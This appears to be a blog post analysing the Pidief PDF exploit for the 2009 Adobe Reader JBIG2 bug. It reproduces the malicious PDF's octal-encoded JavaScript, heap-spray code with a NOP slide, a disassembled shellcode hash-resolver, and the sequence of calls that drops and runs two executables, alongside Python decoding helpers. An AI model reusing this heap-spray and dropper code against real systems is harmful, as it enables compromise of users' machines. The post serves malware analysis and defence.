Analysing the PDF Exploit

I want to present the results of my analysis of the Adobe PDF exploit from March 2009. It allows the execution of arbitrary Win32 code through a bug in the handling of JBIG2 compression. As of 3 March 2009 the bug has only been fixed internally, but Adobe plans to provide an update on March 11th. All Adobe Reader versions from 7.0 upward are vulnerable. The percentage of malicious PDFs that use this bug is still very low; it is not widespread.

Overview of the PDF file

Let's start with an overview of what an exploiting PDF file contains.

There are three main parts to an exploiting PDF: the JavaScript code, the Shellcode and the exploit code. All three are equally important for the exploit to work.

A well-known and widespread virus family is Pidief (the virus analysed here belongs to it). Over its history it has used various exploits in Adobe PDFs to execute malware. The following analysis focuses on the current version of Pidief. Enjoy!

JavaScript Code

Pidief first of all contains JavaScript code, stored as a JavaScript object in the PDF file. The script is octal-encoded and looks like this:

2 0 obj
<</S /JavaScript
/JS (\040\012\012\040\040\040\040\040\040\040\040\146\165\156\143\164\151\157\156\040\160\162\151\156\164\111\156\146\157\050\051\173\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\154\141\156\147\165\141\147\145\072\040\042\040\053\040\141\160\160\056\154\141\156\147\165\141\147\145\051\073\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\166\1
...
>>
endobj
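The octal escapes can be turned back into readable text with a few lines of Python. This is only a minimal sketch: the function name decode_pdf_octal is my own, and it handles nothing but the \ddd escapes seen in this sample (PDF strings also allow escapes such as \n or \( which are ignored here). The sample string is the start of the /JS value above, without the leading whitespace.

```python
import re

def decode_pdf_octal(text: str) -> str:
    """Replace each \\ddd octal escape (1 to 3 digits) with its character."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), text)

# Start of the /JS string shown above (leading whitespace escapes skipped)
sample = (r"\146\165\156\143\164\151\157\156\040"
          r"\160\162\151\156\164\111\156\146\157\050\051\173")

print(decode_pdf_octal(sample))   # prints: function printInfo(){
```

Running it over the whole /JS string gives the plain JavaScript source.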

The script is quite big: decoded it is 42792 bytes long (although most of it is the Shellcode). Before showing the decoded JavaScript code, I want to briefly explain how JavaScript code is executed in PDFs. Adobe uses its own internal engine, so for everyone who is thinking of IE: nope. JavaScript is executed on certain actions (triggers). A German document from Adobe says there are 7 actions that can execute JavaScript; the first one, Open Document, is used here. This gives an important limitation: JavaScript execution in a PDF depends on actions. The following code registers the JavaScript to be executed when the document is opened:

3 0 obj
<</Type /Catalog
/Outlines 4 0 R
/Pages 5 0 R
/OpenAction 2 0 R
>>
endobj
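When looking at a suspicious file, a quick way to spot such a trigger is to search the raw PDF text for the /OpenAction key. The following Python sketch does that with a regular expression. It is a rough aid, not a PDF parser: it assumes the catalog is stored uncompressed and that the action is given as an indirect reference, as in this sample, and the function name find_open_action is my own.

```python
import re

def find_open_action(pdf_text: str):
    """Return (object number, generation) referenced by /OpenAction, or None."""
    m = re.search(r"/OpenAction\s+(\d+)\s+(\d+)\s+R", pdf_text)
    return (int(m.group(1)), int(m.group(2))) if m else None

# The catalog object from this sample
catalog = """3 0 obj
<</Type /Catalog
/Outlines 4 0 R
/Pages 5 0 R
/OpenAction 2 0 R
>>
endobj"""

print(find_open_action(catalog))   # prints: (2, 0)
```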

OpenAction specifies that the object with reference 2 0 is executed (compare with the script object above). The original JavaScript code (shown octal-encoded above):

        function printInfo(){
            console.println("Viewer language: " + app.language);
            console.println("Viewer version: " + app.viewerVersion);
            console.println("Viewer Type: " + app.viewerType);
            console.println("Viewer Variatio: " + app.viewerVariation);
            console.println("Dumping all data objects in the document.");
            if ( this.external )
            {
            console.println("viewing from a browser.");
            }
            else
            {
            console.println("viewing in the Acrobat application.");
            }

            ...

The script contains just two functions: printInfo() and sprayWindows(). The first one only outputs information about the PDF viewer (for debugging), the second one prepares the memory and places the Shellcode in it. As previously mentioned, the script is roughly 42 KB long, but it has only 150 lines, which makes it easy to read. Interestingly, the JavaScript code also contains comments:

	// Create a 1MB string of NOP instructions followed by shellcode:
	//
	// malloc header   string length   NOP slide   shellcode   NULL terminator
	// 32 bytes        4 bytes         x bytes     y bytes     2 bytes
	
	    while (pointers.length <= 0x100000/2) 
		pointers += pointers;
	//Pointers
	    pointers = pointers.substring(0, 0x100000/2 - 32/2 - 4/2 - pointers1.length - 2/2 );

	    while (nop.length <= 0x100000/2)
		nop += nop;	
	//Trampolin
	    nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - jmp.length - 2/2);

//	    while (nop1.length <= 0x100000/2)
//		nop1 += nop1;	
	//shelcode <1M
//	    nop1 = nop1.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );

How the Exploit works

As always, the PDF exploit works by exploiting a bug in the software (Adobe Reader). A common technique is, for example, the "Buffer Overflow": overflowing a buffer on the stack and overwriting return addresses so that they point to attacker-supplied data. This is also used here, in connection with a bug in the JBIG2 compression. The JavaScript code allocates 200 MB and fills it with NOPs (no operation, an assembly opcode) and the Shellcode. Later the JBIG2 bug causes execution to continue somewhere inside the 200 MB buffer. This is why there are so many NOPs: the exact entry point may differ, so the NOPs are executed until the Shellcode is reached. Here is the code which allocates the 200 MB:

	    var x = new Array();
	
	    // Fill 200MB of memory with copies of the NOP slide and shellcode
	    for (i = 0; i < 150; i++) { 
		x[i] = nop+shellcode;
	    }
//	    x[i++] = nop1+shellcode;

	    for (; i < 201; i++) { 
		x[i] = pointers + pointers1;
	    }

It is very interesting that there is different code for Adobe Reader 9 and for Adobe Reader 7.0 and above, so that the exploit works on different versions:

        if(app.viewerVersion>=7.0&app.viewerVersion<9)
        {

Shellcode

The JavaScript code places the Shellcode in memory so that it gets executed through the bug in Adobe Reader. The Shellcode itself is valid Win32 code, stored in escaped form in the JavaScript. Here we leave the JavaScript engine and enter Windows. The first 4 bytes of the Shellcode are the abbreviation "JBIA", which results in 4 valid but junk instructions at the beginning. Let's recall the goal of the Shellcode: to extract and execute the two executables from the PDF. Let's take a look at the initial code:

; [junk code] - "JBIA"
00000000  4A                dec edx
00000001  42                inc edx
00000002  49                dec ecx
00000003  41                inc ecx

; create data on stack (sub esp reserves 288 bytes, 284 of them from edi onwards)
00000004  81EC20010000      sub esp,288
0000000A  8BFC              mov edi,esp
0000000C  83C704            add edi,4                                           ; edi is a pointer to the new allocated data

; store the hashes of Windows API functions for later usage
0000000F  C7073274910C      mov dword [edi],0xc917432                           ; LoadLibraryA
00000015  C747048E130AAC    mov dword [edi+0x4],0xac0a138e                      ; GetFileSize
0000001C  C7470839E27D83    mov dword [edi+0x8],0x837de239                      ; GetTempPathA
00000023  C7470C8FF21861    mov dword [edi+0xc],0x6118f28f                      ; TerminateProcess
0000002A  C747109332E494    mov dword [edi+0x10],0x94e43293                     ; CreateFileA
00000031  C74714A932E494    mov dword [edi+0x14],0x94e432a9                     ; CreateFileW
00000038  C7471843BEACDB    mov dword [edi+0x18],0xdbacbe43                     ; SetFilePointer
0000003F  C7471CB2360F13    mov dword [edi+0x1c],0x130f36b2                     ; ReadFile
00000046  C74720C48D1F74    mov dword [edi+0x20],0x741f8dc4                     ; WriteFile
0000004D  C74724512FA201    mov dword [edi+0x24],0x1a22f51                      ; WinExec
00000054  C7472857660DFF    mov dword [edi+0x28],0xff0d6657                     ; CloseHandle
0000005B  C7472C9B878BE5    mov dword [edi+0x2c],0xe58b879b                     ; GetCommandLineA
00000062  C74730EDAFFFB4    mov dword [edi+0x30],0xb4ffafed                     ; GetModuleFileNameA

; call the code following this instruction
00000069  E997020000        jmp dword Execute_Function

..

Execute_Function:
00000305  E864FDFFFF        call Execute_Shellcode                              ; just for obfuscation, this will never return
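To get from the escaped string in the JavaScript to raw bytes that a disassembler accepts, something like the following Python sketch can be used. It assumes the common %uXXXX form of JavaScript escaping, where every sequence is one 16-bit little-endian word (an assumption, the exact form is not shown in this article). The function name unescape_u is my own, and the input is a made-up two-word string built from the four "JBIA" bytes.

```python
import re
import struct

def unescape_u(escaped: str) -> bytes:
    """Turn %uXXXX sequences into raw bytes (little-endian 16-bit words)."""
    words = re.findall(r"%u([0-9A-Fa-f]{4})", escaped)
    return b"".join(struct.pack("<H", int(w, 16)) for w in words)

# Hypothetical input: the first four Shellcode bytes 4A 42 49 41 as two words
print(unescape_u("%u424A%u4149"))   # prints: b'JBIA'
```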

So what happens here is that function name hashes are stored on the stack and a cheap obfuscation call is made. The jmp instruction jumps to a call which calls the code following the jmp instruction, so you could remove the jmp and call instructions and it would have the same effect. At the very beginning the code resolves its hashes to function addresses:

Execute_Shellcode:

; Arguments:
;   edi = pointer to the data/code stored on stack

0000006E  64A130000000      mov eax,[fs:0x30]                                   ; get a pointer to the Process Environment Block
00000074  8B400C            mov eax,[eax+12]                                    ; get a pointer to PEB_LDR_DATA structure
00000077  8B701C            mov esi,[eax+28]                                    ; -> PEB_LDR_DATA.InInitializationOrderModuleList.LDR_DATA_TABLE_ENTRY/LDR_MODULE   (UNDOCUMENTED)
0000007A  AD                lodsd                                               ; double linked list, Forward link, to LDR_DATA_TABLE_ENTRY / LDR_MODULE structure  (UNDOCUMENTED)
0000007B  8B6808            mov ebp,[eax+8]                                     ; DllBase (Module Base Address)                                                     (UNDOCUMENTED)

; resolve the 13 function hashes
0000007E  8BF7              mov esi,edi                                         ; esi points to the first hash to resolve
00000080  6A0D              push byte 13                                        ; loop 13 times
00000082  59                pop ecx                                             ; ecx is counter
Resolve_Hashes:
00000083  E838020000        call dword ResolveImportsByHashes
00000088  E2F9              loop Resolve_Hashes

..

ResolveImportsByHashes:

; resolves function hashes

;   ebp = Module Address
;   edi = pointer to hash to resolve and exchange with functions address

; store register contents
000002C0  51                push ecx
000002C1  56                push esi

000002C2  8B753C            mov esi,[ebp+0x3C]                                  ; -> PE Header (skip DOS Header)
000002C5  8B742E78          mov esi,[esi+ebp+0x78]                              ; Export Table Virtual Address
000002C9  03F5              add esi,ebp                                         ;   (absolute address)

000002CB  56                push esi                                            ; store address of Export Directory Table
000002CC  8B7620            mov esi,[esi+0x20]                                  ; Name Pointer RVA (list of all functions)
000002CF  03F5              add esi,ebp                                         ;   (absolute address)
000002D1  33C9              xor ecx,ecx
000002D3  49                dec ecx                                             ; ecx is name counter

Function_Name_loop:
000002D4  41                inc ecx                                             ; -> next function name
000002D5  AD                lodsd                                               ; get the address of the function name
000002D6  03C5              add eax,ebp                                         ;   (absolute address)
000002D8  33DB              xor ebx,ebx                                         ; reset next hash to generate

Generate_Hash_of_Function_Name:
000002DA  0FBE10            movsx edx,byte [eax]                                ; load next character
000002DD  3AD6              cmp dl,dh                                           ; zero terminator?
000002DF  7408              jz Generated_Hash
000002E1  C1CB07            ror ebx,7                                           ; => this is the hash generating algorithm:  hash = ror(hash, 7) + char
000002E4  03DA              add ebx,edx                                         ;  (add the character to the rotated hash)
000002E6  40                inc eax                                             ; -> next character
000002E7  EBF1              jmp short Generate_Hash_of_Function_Name

Generated_Hash:
000002E9  3B1F              cmp ebx,[edi]                                       ; matches the input hash with generated one?
000002EB  75E7              jnz Function_Name_loop                              ; if not compare against next function

000002ED  5E                pop esi                                             ; restore address of Export Directory Table
000002EE  8B5E24            mov ebx,[esi+0x24]                                  ; Ordinal Table
000002F1  03DD              add ebx,ebp                                         ;   (absolute address)
000002F3  668B0C4B          mov cx,[ebx+ecx*2]                                  ; look up the function in the Ordinal Table to get the ordinal number
000002F7  8B5E1C            mov ebx,[esi+0x1c]                                  ; Export Address Table
000002FA  03DD              add ebx,ebp                                         ;   (absolute address)
000002FC  8B048B            mov eax,[ebx+ecx*4]                                 ; -> look up the Address of the function (ordinal number in EAT)
000002FF  03C5              add eax,ebp                                         ;   (absolute address)
00000301  AB                stosd                                               ; overwrite the input hash with the address

; restore register contents
00000302  5E                pop esi
00000303  59                pop ecx

00000304  C3                ret
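The loop at Generate_Hash_of_Function_Name is easy to reproduce outside of the Shellcode, which is handy for finding out which API name belongs to which constant. The following Python sketch rotates the running 32-bit hash right by 7 and then adds the next character. The function names ror32 and api_hash are my own; the original uses movsx (sign extension), which makes no difference for plain ASCII names.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def api_hash(name: str) -> int:
    """hash = ror(hash, 7) + char for every character of the export name."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 7) + ch) & 0xFFFFFFFF
    return h

print(hex(api_hash("LoadLibraryA")))   # prints: 0xc917432
print(hex(api_hash("WinExec")))        # prints: 0x1a22f51
```

Both values match the constants stored at [edi] and [edi+0x24] in the listing at the start of the Shellcode.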

This is the typical ResolveImportsByHashes function that is part of a lot of malware; compare it with Sinowal. And like many such resolve functions it uses a ror 7 to generate the hash (very typical). The rest of the code is not that exciting, just standard API calls. As in the Sinowal analysis I do not want to flood this post with code, so the following is the list of calls:

Kernel32!GetFileSize(FileHandle +4, NULL);
  done in a loop to get the size of every open file and compare it with the fixed PDF file size,
  in order to find the file handle of the PDF file

Kernel32!GetTempPathA(Stack Buffer, 256 bytes);
  returns the temp path, where the 2 executables will be stored

appending "\SVCHOST.EXE" to the temp path

Kernel32!CreateFileA("C:\Windows\Temp\SVCHOST.EXE", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
  creates the first file in the temp path

Kernel32!SetFilePointer(PDF File Handle, File Position = where the string is, NULL, FILE_BEGIN);
  sets file pointer in PDF file to a special configuration block

Kernel32!ReadFile(PDF File Handle, Buffer, 48 Bytes, &NumberOfBytesRead, NULL);
  reads the configuration block (30h bytes)

Kernel32!SetFilePointer(PDF File Handle, File Position, NULL, FILE_BEGIN);
  sets the file pointer to the position of the file to extract within the PDF file, taken from the configuration block

Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(Created File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
  both done in a loop to copy the whole first file
  directly after each read the buffer is decrypted with xor 97h

Kernel32!CloseHandle(Created File);

Kernel32!WinExec(Created File Name, 0);
  the malware will be executed


strcat(Temp Path, "\temp.exe");
  the second file's name is temp.exe

Kernel32!CreateFileA(Second File Name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
  also created in the temp directory

Kernel32!SetFilePointer(PDF File Handle, File Position = somewhere in the file, NULL, FILE_BEGIN);
  this time the file position is hard-coded

Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(Created File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
  again both done in a loop to copy the whole second file
  directly after each read the buffer is decrypted, this time with xor A0h

Kernel32!SetFilePointer(Created File Handle, File Position = 9000h, NULL, FILE_BEGIN);
  the file pointer of the second file will be moved to that position

Kernel32!WriteFile(Created File Handle, previously read configuration buffer, 40 Bytes, &NumberOfBytesWritten, NULL);
  and the configuration block is written there

Kernel32!CloseHandle(Created File);

Kernel32!WinExec(Created Second File Name, 0);
  this file is executed as well


Kernel32!CloseHandle(Created File);

** programming error: this call makes the process crash

Kernel32!TerminateProcess(Current Process, Exit Code = 0);
  will never be executed, but was meant to terminate Adobe Reader smoothly

  ...and that's it!
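The extraction steps in the list can be imitated offline to carve the embedded files out of a sample without running anything. The Python sketch below is a simplified assumption of mine, not the Shellcode's exact logic: it slices a byte range out of the PDF data and applies the single-byte xor (97h for the first file, A0h for the second). The names xor_decode and carve are my own, and the demo data is made up.

```python
def xor_decode(data: bytes, key: int) -> bytes:
    """Apply a single-byte xor to every byte of data."""
    return bytes(b ^ key for b in data)

def carve(pdf: bytes, offset: int, size: int, key: int) -> bytes:
    """Cut size bytes at offset out of the PDF data and xor-decode them."""
    return xor_decode(pdf[offset:offset + size], key)

# Made-up demo data: a fake prefix followed by an xor-encoded "MZ" header
prefix = b"%PDF-1.4 junk"
hidden = xor_decode(b"MZ\x90\x00", 0x97)
blob = prefix + hidden

print(carve(blob, len(prefix), 4, 0x97))   # prints: b'MZ\x90\x00'
```

For a real sample, offset and size would come from the configuration block described in the next section.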

Configuration Block

As mentioned, the PDF file contains a configuration block, of which the Shellcode reads 48 bytes (30h). The Shellcode uses two values from it: where the first file is located in the PDF and how long it is. Furthermore, 40 bytes of the configuration block are copied into the second file. The configuration block is hard-coded at position 171984 (29FD0h) in the PDF file and contains the following bytes:

00029FD0  41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30  AAI AMOS 11-02-0
00029FE0  39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78  9.pdf..t.xxxxxxx
00029FF0  78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00  xxxxxxxx.....G..

The next-to-last dword, 0004B0C8, is the size of the primary target file (307400 bytes). The last dword, 000347FC, is the position of the file within the PDF file, but 0x2a000 and 0xb000 are added at runtime to get the actual position.
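The two dwords can be read from the dump with Python's struct module. The sketch below works on the 48 bytes shown above; the variable names are my own, and treating the text before the first zero byte as a label is only my reading of the dump. The last line simply adds the two runtime constants mentioned above to the stored position.

```python
import struct

# The 48 bytes of the configuration block, copied from the dump above
CONFIG_BLOCK = bytes.fromhex(
    "41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30 "
    "39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78 "
    "78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00"
)

# Text up to the first zero byte (assumption: a label or file name)
label = CONFIG_BLOCK.split(b"\x00", 1)[0].decode("ascii")

# The last two little-endian dwords: file size and stored position
file_size, stored_pos = struct.unpack_from("<II", CONFIG_BLOCK, 40)

print(label)                                # prints: AAI AMOS 11-02-09.pdf
print(file_size)                            # prints: 307400
print(hex(stored_pos))                      # prints: 0x347fc
print(hex(stored_pos + 0x2A000 + 0xB000))   # prints: 0x697fc
```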

Programming Errors in Pidief

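I encountered various bugs in the Shellcode of Pidief, for example the final CloseHandle call marked in the list above, which crashes the process before TerminateProcess is reached.

The code is also not very efficient and could have been written better. It contains junk instructions and redundant code.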

Affected Systems

All Windows XP systems with Adobe Reader 7.0 or higher are affected until the security fix is installed, which Adobe Systems wants to release on March 11, 2009. Furthermore, JavaScript must be enabled in Adobe Reader (which it is by default). In the link below Adobe Systems explains how to deactivate it in the preferences.

I cannot currently say whether Vista is affected too. I am not sure because the Shellcode uses the Process Environment Block and LDR data structures, which change heavily between Windows versions. It is also not yet clear what the malware executables do and whether they are Vista compatible; I'll review that later.

Downloads

Download the Pidief Shellcode here. For any other information or files, please send me a request.

Conclusion

PDF exploits are quite nice, but also difficult to find. As a virus writer you would need to take a very close look at Adobe Reader to find one, but once found it is worth a few thousand euros (up to 10,000 on the market). As an end user, remember to always keep your Adobe Reader updated (use the latest version) and turn automatic updates on.

References